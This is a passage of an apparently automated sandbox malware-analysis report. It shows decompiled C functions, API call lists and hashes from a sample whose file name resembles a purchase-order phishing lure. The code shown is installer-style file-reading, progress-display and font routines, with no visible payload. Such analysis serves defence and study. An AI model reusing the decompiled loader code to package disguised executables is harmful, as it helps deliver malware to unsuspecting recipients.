                                                              														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x38), __ebp - 0x40, 1) == 0) {
                                                              															continue;
                                                              														} else {
                                                              															goto L21;
                                                              														}
                                                              														goto L22;
                                                              													}
                                                              												}
                                                              												L22:
                                                              												if( *((intOrPtr*)(__ebp - 0x20)) != __ebx) {
                                                              													goto L28;
                                                              												} else {
                                                              													if( *(__ebp - 8) == 0xd ||  *(__ebp - 8) == 0xa) {
                                                              														if( *(__ebp - 8) == __ax || __ax != 0xd && __ax != 0xa) {
                                                              															 *(__ebp - 0x3c) =  ~( *(__ebp - 0x3c));
                                                              															__eax = SetFilePointer( *(__ebp - 0x14),  ~( *(__ebp - 0x3c)), __ebx, 1);
                                                              														} else {
                                                              															__ecx =  *(__ebp - 0x10);
                                                              															 *(__ebp - 0xc) =  *(__ebp - 0xc) + 1;
                                                              															 *( *(__ebp - 0x10) +  *(__ebp - 0xc) * 2) = __ax;
                                                              														}
                                                              														goto L34;
                                                              													} else {
                                                              														__ecx =  *(__ebp - 0x10);
                                                              														 *(__ebp - 0xc) =  *(__ebp - 0xc) + 1;
                                                              														 *( *(__ebp - 0x10) +  *(__ebp - 0xc) * 2) = __ax;
                                                              														 *(__ebp - 8) = __eax;
                                                              														if(__ax == __bx) {
                                                              															goto L34;
                                                              														} else {
                                                              															goto L26;
                                                              														}
                                                              													}
                                                              												}
                                                              											}
                                                              										}
                                                              									}
                                                              								}
                                                              								goto L37;
                                                              								L26:
                                                              								__eax =  *(__ebp - 0xc);
                                                              							} while ( *(__ebp - 0xc) <  *(__ebp - 0x48));
                                                              						}
                                                              						goto L34;
                                                              					}
                                                              				}
                                                              				L37:
                                                              				return 0;
                                                              			}







                                                              0x004025e7
                                                              0x004025ea
                                                              0x004025ec
                                                              0x004025ef
                                                              0x004025f4
                                                              0x004025f7
                                                              0x004025fa
                                                              0x00402a4c
                                                              0x00402a4f
                                                              0x00402600
                                                              0x00402600
                                                              0x00402607
                                                              0x00402609
                                                              0x00402609
                                                              0x0040260f
                                                              0x00402773
                                                              0x00402773
                                                              0x00402776
                                                              0x0040277b
                                                              0x004015ae
                                                              0x0040281e
                                                              0x0040281e
                                                              0x00000000
                                                              0x00402615
                                                              0x00402616
                                                              0x00402621
                                                              0x00402624
                                                              0x00402630
                                                              0x00402634
                                                              0x004026cc
                                                              0x004026e4
                                                              0x004026f4
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0040263a
                                                              0x0040263a
                                                              0x0040263d
                                                              0x0040263e
                                                              0x00402641
                                                              0x00402646
                                                              0x0040264d
                                                              0x00402655
                                                              0x00000000
                                                              0x0040265b
                                                              0x0040265b
                                                              0x00402660
                                                              0x00000000
                                                              0x00402666
                                                              0x00402666
                                                              0x0040266e
                                                              0x00402671
                                                              0x00402674
                                                              0x0040272f
                                                              0x00402736
                                                              0x0040267a
                                                              0x00402680
                                                              0x0040268c
                                                              0x004026f6
                                                              0x004026f6
                                                              0x0040268e
                                                              0x0040268e
                                                              0x00402691
                                                              0x00402693
                                                              0x00402693
                                                              0x00402693
                                                              0x00402696
                                                              0x0040269b
                                                              0x0040269e
                                                              0x00000000
                                                              0x00000000
                                                              0x004026a0
                                                              0x004026a3
                                                              0x004026ab
                                                              0x004026b7
                                                              0x004026c5
                                                              0x00000000
                                                              0x004026c7
                                                              0x00000000
                                                              0x004026c7
                                                              0x00000000
                                                              0x004026c5
                                                              0x00402693
                                                              0x004026f9
                                                              0x004026fc
                                                              0x00000000
                                                              0x004026fe
                                                              0x00402703
                                                              0x00402744
                                                              0x00402766
                                                              0x0040276d
                                                              0x00402752
                                                              0x00402752
                                                              0x00402758
                                                              0x0040275b
                                                              0x0040275b
                                                              0x00000000
                                                              0x0040270c
                                                              0x0040270c
                                                              0x00402712
                                                              0x00402718
                                                              0x0040271c
                                                              0x0040271f
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0040271f
                                                              0x00402703
                                                              0x004026fc
                                                              0x00402674
                                                              0x00402660
                                                              0x00402655
                                                              0x00000000
                                                              0x00402721
                                                              0x00402721
                                                              0x00402724
                                                              0x0040272d
                                                              0x00000000
                                                              0x00402624
                                                              0x0040260f
                                                              0x00402a55
                                                              0x00402a5b

                                                              APIs
                                                              • ReadFile.KERNELBASE(?,?,?,?), ref: 0040264D
                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402688
                                                              • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004026AB
                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004026C1
                                                                • Part of subcall function 00405CE8: SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,00000000,?,?,004025CA,00000000,00000000,?,00000000,00000011), ref: 00405CFE
                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: File$Pointer$ByteCharMultiWide$Read
                                                              • String ID: 9
                                                              • API String ID: 163830602-2366072709
                                                              • Opcode ID: 1d16e4b4e9071ee1365a26ee0af684b72516ff45d02c382df6d476000192f948
                                                              • Instruction ID: ba8ec8e77c4dae38fecb7239611b9da649e1c788ef9a4e56db7abbfefa36dde0
                                                              • Opcode Fuzzy Hash: 1d16e4b4e9071ee1365a26ee0af684b72516ff45d02c382df6d476000192f948
                                                              • Instruction Fuzzy Hash: A1512874D00219AADF209F94CA88ABEB779FF04344F50447BE501B72D0DBB999429B69
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 868 405191-4051a6 869 4051ac-4051bd 868->869 870 40525d-405261 868->870 871 4051c8-4051d4 lstrlenW 869->871 872 4051bf-4051c3 call 406054 869->872 874 4051f1-4051f5 871->874 875 4051d6-4051e6 lstrlenW 871->875 872->871 877 405204-405208 874->877 878 4051f7-4051fe SetWindowTextW 874->878 875->870 876 4051e8-4051ec lstrcatW 875->876 876->874 879 40520a-40524c SendMessageW * 3 877->879 880 40524e-405250 877->880 878->877 879->880 880->870 881 405252-405255 880->881 881->870
                                                              C-Code - Quality: 100%
                                                              			E00405191(signed int _a4, WCHAR* _a8) {
                                                              				struct HWND__* _v8;
                                                              				signed int _v12;
                                                              				WCHAR* _v32;
                                                              				long _v44;
                                                              				int _v48;
                                                              				void* _v52;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				WCHAR* _t27;
                                                              				signed int _t28;
                                                              				long _t29;
                                                              				signed int _t37;
                                                              				signed int _t38;
                                                              
                                                              				_t27 =  *0x7a7a24; // 0x10442
                                                              				_v8 = _t27;
                                                              				if(_t27 != 0) {
                                                              					_t37 =  *0x7a8af4;
                                                              					_v12 = _t37;
                                                              					_t38 = _t37 & 0x00000001;
                                                              					if(_t38 == 0) {
                                                              						E00406054(_t38, 0, 0x7a0f20, 0x7a0f20, _a4);
                                                              					}
                                                              					_t27 = lstrlenW(0x7a0f20);
                                                              					_a4 = _t27;
                                                              					if(_a8 == 0) {
                                                              						L6:
                                                              						if((_v12 & 0x00000004) == 0) {
                                                              							_t27 = SetWindowTextW( *0x7a7a08, 0x7a0f20); // executed
                                                              						}
                                                              						if((_v12 & 0x00000002) == 0) {
                                                              							_v32 = 0x7a0f20;
                                                              							_v52 = 1;
                                                              							_t29 = SendMessageW(_v8, 0x1004, 0, 0); // executed
                                                              							_v44 = 0;
                                                              							_v48 = _t29 - _t38;
                                                              							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52); // executed
                                                              							_t27 = SendMessageW(_v8, 0x1013, _v48, 0); // executed
                                                              						}
                                                              						if(_t38 != 0) {
                                                              							_t28 = _a4;
                                                              							0x7a0f20[_t28] = 0;
                                                              							return _t28;
                                                              						}
                                                              					} else {
                                                              						_t27 = lstrlenW(_a8) + _a4;
                                                              						if(_t27 < 0x1000) {
                                                              							_t27 = lstrcatW(0x7a0f20, _a8);
                                                              							goto L6;
                                                              						}
                                                              					}
                                                              				}
                                                              				return _t27;
                                                              			}

















                                                              0x00405197
                                                              0x004051a1
                                                              0x004051a6
                                                              0x004051ac
                                                              0x004051b7
                                                              0x004051ba
                                                              0x004051bd
                                                              0x004051c3
                                                              0x004051c3
                                                              0x004051c9
                                                              0x004051d1
                                                              0x004051d4
                                                              0x004051f1
                                                              0x004051f5
                                                              0x004051fe
                                                              0x004051fe
                                                              0x00405208
                                                              0x00405211
                                                              0x0040521d
                                                              0x00405224
                                                              0x00405228
                                                              0x0040522b
                                                              0x0040523e
                                                              0x0040524c
                                                              0x0040524c
                                                              0x00405250
                                                              0x00405252
                                                              0x00405255
                                                              0x00000000
                                                              0x00405255
                                                              0x004051d6
                                                              0x004051de
                                                              0x004051e6
                                                              0x004051ec
                                                              0x00000000
                                                              0x004051ec
                                                              0x004051e6
                                                              0x004051d4
                                                              0x00405261

                                                              APIs
                                                              • lstrlenW.KERNEL32(007A0F20,00000000,007924F8,762E23A0,?,?,?,?,?,?,?,?,?,00403168,00000000,?), ref: 004051C9
                                                              • lstrlenW.KERNEL32(00403168,007A0F20,00000000,007924F8,762E23A0,?,?,?,?,?,?,?,?,?,00403168,00000000), ref: 004051D9
                                                              • lstrcatW.KERNEL32(007A0F20,00403168), ref: 004051EC
                                                              • SetWindowTextW.USER32(007A0F20,007A0F20), ref: 004051FE
                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405224
                                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523E
                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524C
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                              • String ID:
                                                              • API String ID: 2531174081-0
                                                              • Opcode ID: 1195aa0cb1608473c7f4939b13196918cf4c2ab7f0875985e493b2af82bd967e
                                                              • Instruction ID: 239aa3d806fe655a10670de66778763bf8aa2df942fa5917c93f0fd796d6fb5a
                                                              • Opcode Fuzzy Hash: 1195aa0cb1608473c7f4939b13196918cf4c2ab7f0875985e493b2af82bd967e
                                                              • Instruction Fuzzy Hash: 6E21A171900518BACF119FA5DD849CFBFB9EF85354F10806AF904B6291D7794A50CF98
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              C-Code - Quality: 71%
                                                              			E00401D56() {
                                                              				void* __esi;
                                                              				int _t7;
                                                              				signed char _t13;
                                                              				struct HFONT__* _t16;
                                                              				void* _t20;
                                                              				struct HDC__* _t26;
                                                              				void* _t28;
                                                              				void* _t30;
                                                              
                                                              				_t26 = GetDC( *(_t30 - 0xc));
                                                              				_t7 = GetDeviceCaps(_t26, 0x5a);
                                                              				0x40cdd0->lfHeight =  ~(MulDiv(E00402BA2(2), _t7, 0x48));
                                                              				ReleaseDC( *(_t30 - 0xc), _t26);
                                                              				 *0x40cde0 = E00402BA2(3);
                                                              				_t13 =  *((intOrPtr*)(_t30 - 0x1c));
                                                              				 *0x40cde7 = 1;
                                                              				 *0x40cde4 = _t13 & 0x00000001;
                                                              				 *0x40cde5 = _t13 & 0x00000002;
                                                              				 *0x40cde6 = _t13 & 0x00000004;
                                                              				E00406054(_t20, _t26, _t28, "Tahoma",  *((intOrPtr*)(_t30 - 0x28)));
                                                              				_t16 = CreateFontIndirectW(0x40cdd0); // executed
                                                              				_push(_t16);
                                                              				_push(_t28);
                                                              				E00405F79();
                                                              				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t30 - 4));
                                                              				return 0;
                                                              			}











                                                              0x00401d5f
                                                              0x00401d66
                                                              0x00401d81
                                                              0x00401d86
                                                              0x00401d93
                                                              0x00401d98
                                                              0x00401da3
                                                              0x00401daa
                                                              0x00401dbc
                                                              0x00401dc2
                                                              0x00401dc7
                                                              0x00401dd1
                                                              0x00402531
                                                              0x00401565
                                                              0x004029f2
                                                              0x00402a4f
                                                              0x00402a5b

                                                              APIs
                                                              • GetDC.USER32(?), ref: 00401D59
                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
                                                              • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
                                                              • ReleaseDC.USER32(?,00000000), ref: 00401D86
                                                              • CreateFontIndirectW.GDI32(0040CDD0), ref: 00401DD1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                                              • String ID: Tahoma
                                                              • API String ID: 3808545654-3580928618
                                                              • Opcode ID: 500d07c7ab604488b997273f6a95938f3c1fb7337d52538531d648fcc8621206
                                                              • Instruction ID: 622cf3373c7b4650c41a942921d5e593d98aece64efbd6d354285906af2a4305
                                                              • Opcode Fuzzy Hash: 500d07c7ab604488b997273f6a95938f3c1fb7337d52538531d648fcc8621206
                                                              • Instruction Fuzzy Hash: 09014F31944640EFE701ABB0AF4ABDA3F74AB66305F104579E641B61E2DA7800059B2D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 891 403027-40303e 892 403040 891->892 893 403047-403050 891->893 892->893 894 403052 893->894 895 403059-40305e 893->895 894->895 896 403060-403069 call 403235 895->896 897 40306e-40307b call 40321f 895->897 896->897 901 403081-403085 897->901 902 40320d 897->902 903 4031b8-4031ba 901->903 904 40308b-4030b1 GetTickCount 901->904 905 40320f-403210 902->905 909 4031fa-4031fd 903->909 910 4031bc-4031bf 903->910 906 403215 904->906 907 4030b7-4030bf 904->907 908 403218-40321c 905->908 906->908 912 4030c1 907->912 913 4030c4-4030d2 call 40321f 907->913 914 403202-40320b call 40321f 909->914 915 4031ff 909->915 910->906 911 4031c1 910->911 916 4031c4-4031ca 911->916 912->913 913->902 925 4030d8-4030e1 913->925 914->902 923 403212 914->923 915->914 919 4031cc 916->919 920 4031ce-4031dc call 40321f 916->920 919->920 920->902 928 4031de-4031ea call 405cb9 920->928 923->906 927 4030e7-403107 call 406527 925->927 933 4031b0-4031b2 927->933 934 40310d-403120 GetTickCount 927->934 935 4031b4-4031b6 928->935 936 4031ec-4031f6 928->936 933->905 937 403122-40312a 934->937 938 40316b-40316d 934->938 935->905 936->916 941 4031f8 936->941 942 403132-403168 MulDiv wsprintfW call 405191 937->942 943 40312c-403130 937->943 939 4031a4-4031a8 938->939 940 40316f-403173 938->940 939->907 946 4031ae 939->946 944 403175-40317c call 405cb9 940->944 945 40318a-403195 940->945 941->906 942->938 943->938 943->942 951 403181-403183 944->951 950 403198-40319c 945->950 946->906 950->927 952 4031a2 950->952 951->935 953 403185-403188 951->953 952->906 953->950
                                                              C-Code - Quality: 95%
                                                              			E00403027(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
                                                              				signed int _v8;
                                                              				int _v12;
                                                              				intOrPtr _v16;
                                                              				long _v20;
                                                              				intOrPtr _v24;
                                                              				short _v152;
                                                              				void* _t65;
                                                              				long _t70;
                                                              				intOrPtr _t74;
                                                              				long _t75;
                                                              				intOrPtr _t76;
                                                              				void* _t77;
                                                              				int _t87;
                                                              				intOrPtr _t91;
                                                              				intOrPtr _t94;
                                                              				long _t95;
                                                              				signed int _t96;
                                                              				int _t97;
                                                              				int _t98;
                                                              				intOrPtr _t99;
                                                              				void* _t100;
                                                              				void* _t101;
                                                              
                                                              				_t96 = _a16;
                                                              				_t91 = _a12;
                                                              				_v12 = _t96;
                                                              				if(_t91 == 0) {
                                                              					_v12 = 0x8000;
                                                              				}
                                                              				_v8 = _v8 & 0x00000000;
                                                              				_v16 = _t91;
                                                              				if(_t91 == 0) {
                                                              					_v16 = 0x78f6f8;
                                                              				}
                                                              				_t62 = _a4;
                                                              				if(_a4 >= 0) {
                                                              					E00403235( *0x7a8a98 + _t62);
                                                              				}
                                                              				if(E0040321F( &_a16, 4) == 0) {
                                                              					L41:
                                                              					_push(0xfffffffd);
                                                              					goto L42;
                                                              				} else {
                                                              					if((_a19 & 0x00000080) == 0) {
                                                              						if(_t91 != 0) {
                                                              							if(_a16 < _t96) {
                                                              								_t96 = _a16;
                                                              							}
                                                              							if(E0040321F(_t91, _t96) != 0) {
                                                              								_v8 = _t96;
                                                              								L44:
                                                              								return _v8;
                                                              							} else {
                                                              								goto L41;
                                                              							}
                                                              						}
                                                              						if(_a16 <= _t91) {
                                                              							goto L44;
                                                              						}
                                                              						_t87 = _v12;
                                                              						while(1) {
                                                              							_t97 = _a16;
                                                              							if(_a16 >= _t87) {
                                                              								_t97 = _t87;
                                                              							}
                                                              							if(E0040321F(0x78b6f8, _t97) == 0) {
                                                              								goto L41;
                                                              							}
                                                              							if(E00405CB9(_a8, 0x78b6f8, _t97) == 0) {
                                                              								L28:
                                                              								_push(0xfffffffe);
                                                              								L42:
                                                              								_pop(_t65);
                                                              								return _t65;
                                                              							}
                                                              							_v8 = _v8 + _t97;
                                                              							_a16 = _a16 - _t97;
                                                              							if(_a16 > 0) {
                                                              								continue;
                                                              							}
                                                              							goto L44;
                                                              						}
                                                              						goto L41;
                                                              					}
                                                              					_t70 = GetTickCount();
                                                              					 *0x40ce58 =  *0x40ce58 & 0x00000000;
                                                              					_t14 =  &_a16;
                                                              					 *_t14 = _a16 & 0x7fffffff;
                                                              					_v20 = _t70;
                                                              					 *0x40ce40 = 0xb;
                                                              					_a4 = _a16;
                                                              					if( *_t14 <= 0) {
                                                              						goto L44;
                                                              					} else {
                                                              						goto L9;
                                                              					}
                                                              					while(1) {
                                                              						L9:
                                                              						_t98 = 0x4000;
                                                              						if(_a16 < 0x4000) {
                                                              							_t98 = _a16;
                                                              						}
                                                              						if(E0040321F(0x78b6f8, _t98) == 0) {
                                                              							goto L41;
                                                              						}
                                                              						_a16 = _a16 - _t98;
                                                              						 *0x40ce30 = 0x78b6f8;
                                                              						 *0x40ce34 = _t98;
                                                              						while(1) {
                                                              							_t94 = _v16;
                                                              							 *0x40ce38 = _t94;
                                                              							 *0x40ce3c = _v12;
                                                              							_t74 = E00406527(0x40ce30);
                                                              							_v24 = _t74;
                                                              							if(_t74 < 0) {
                                                              								break;
                                                              							}
                                                              							_t99 =  *0x40ce38; // 0x7924f8
                                                              							_t100 = _t99 - _t94;
                                                              							_t75 = GetTickCount();
                                                              							_t95 = _t75;
                                                              							if(( *0x7a8af4 & 0x00000001) != 0 && (_t75 - _v20 > 0xc8 || _a16 == 0)) {
                                                              								wsprintfW( &_v152, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
                                                              								_t101 = _t101 + 0xc;
                                                              								E00405191(0,  &_v152);
                                                              								_v20 = _t95;
                                                              							}
                                                              							if(_t100 == 0) {
                                                              								if(_a16 > 0) {
                                                              									goto L9;
                                                              								}
                                                              								goto L44;
                                                              							} else {
                                                              								if(_a12 != 0) {
                                                              									_t76 =  *0x40ce38; // 0x7924f8
                                                              									_v8 = _v8 + _t100;
                                                              									_v12 = _v12 - _t100;
                                                              									_v16 = _t76;
                                                              									L23:
                                                              									if(_v24 != 4) {
                                                              										continue;
                                                              									}
                                                              									goto L44;
                                                              								}
                                                              								_t77 = E00405CB9(_a8, _v16, _t100); // executed
                                                              								if(_t77 == 0) {
                                                              									goto L28;
                                                              								}
                                                              								_v8 = _v8 + _t100;
                                                              								goto L23;
                                                              							}
                                                              						}
                                                              						_push(0xfffffffc);
                                                              						goto L42;
                                                              					}
                                                              					goto L41;
                                                              				}
                                                              			}

























                                                              0x00403032
                                                              0x00403036
                                                              0x00403039
                                                              0x0040303e
                                                              0x00403040
                                                              0x00403040
                                                              0x00403047
                                                              0x0040304b
                                                              0x00403050
                                                              0x00403052
                                                              0x00403052
                                                              0x00403059
                                                              0x0040305e
                                                              0x00403069
                                                              0x00403069
                                                              0x0040307b
                                                              0x0040320d
                                                              0x0040320d
                                                              0x00000000
                                                              0x00403081
                                                              0x00403085
                                                              0x004031ba
                                                              0x004031fd
                                                              0x004031ff
                                                              0x004031ff
                                                              0x0040320b
                                                              0x00403212
                                                              0x00403215
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0040320b
                                                              0x004031bf
                                                              0x00000000
                                                              0x00000000
                                                              0x004031c1
                                                              0x004031c4
                                                              0x004031c7
                                                              0x004031ca
                                                              0x004031cc
                                                              0x004031cc
                                                              0x004031dc
                                                              0x00000000
                                                              0x00000000
                                                              0x004031ea
                                                              0x004031b4
                                                              0x004031b4
                                                              0x0040320f
                                                              0x0040320f
                                                              0x00000000
                                                              0x0040320f
                                                              0x004031ec
                                                              0x004031ef
                                                              0x004031f6
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x004031f8
                                                              0x00000000
                                                              0x004031c4
                                                              0x00403091
                                                              0x00403093
                                                              0x0040309a
                                                              0x0040309a
                                                              0x004030a1
                                                              0x004030a7
                                                              0x004030ae
                                                              0x004030b1
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x004030b7
                                                              0x004030b7
                                                              0x004030b7
                                                              0x004030bf
                                                              0x004030c1
                                                              0x004030c1
                                                              0x004030d2
                                                              0x00000000
                                                              0x00000000
                                                              0x004030d8
                                                              0x004030db
                                                              0x004030e1
                                                              0x004030e7
                                                              0x004030e7
                                                              0x004030f2
                                                              0x004030f8
                                                              0x004030fd
                                                              0x00403104
                                                              0x00403107
                                                              0x00000000
                                                              0x00000000
                                                              0x0040310d
                                                              0x00403113
                                                              0x00403115
                                                              0x0040311e
                                                              0x00403120
                                                              0x00403151
                                                              0x00403157
                                                              0x00403163
                                                              0x00403168
                                                              0x00403168
                                                              0x0040316d
                                                              0x004031a8
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0040316f
                                                              0x00403173
                                                              0x0040318a
                                                              0x0040318f
                                                              0x00403192
                                                              0x00403195
                                                              0x00403198
                                                              0x0040319c
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x004031a2
                                                              0x0040317c
                                                              0x00403183
                                                              0x00000000
                                                              0x00000000
                                                              0x00403185
                                                              0x00000000
                                                              0x00403185
                                                              0x0040316d
                                                              0x004031b0
                                                              0x00000000
                                                              0x004031b0
                                                              0x00000000
                                                              0x004030b7

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
